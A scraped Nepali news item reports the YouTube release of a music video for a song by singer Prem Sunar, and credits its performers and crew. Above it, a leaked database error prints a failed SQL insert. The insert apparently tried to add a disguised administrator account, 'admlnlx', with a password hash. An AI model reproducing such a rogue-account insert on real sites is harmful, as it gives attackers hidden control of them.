WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BnHk1IkJgCTtAZoKssM2DrRAWSfyXp.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 21:57:30', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाण्डौं । गायक प्रेम सुनारको स्कुटिमा चढिछेउ बोलको गीतको म्युजिक भिडियो युटुबमा सार्वजनिक भएको छ ।
गाउँले ईन्टरटेनमेन्ट मिडिया ग्रुपको पोष्ट प्रोडक्सनमा निमार्ण भएको म्युजिक भिडियोमा श्रीशक्ति बराईली, सविना तमाङ, मदन थापा र बिक्रम गौतमको फिचरिङ हेर्नसकिने छ ।
मदन कुमार थापा र श्रीशक्ति बराईलीको निर्देशन गंगाराम राईको छयाङ्कन र संम्पादन रहेको उक्त म्युजिक भिडियो गाउँले इन्टरटेनमेन्टको युटुब च्यानलबाट सार्वजनिक गरिएको छ ।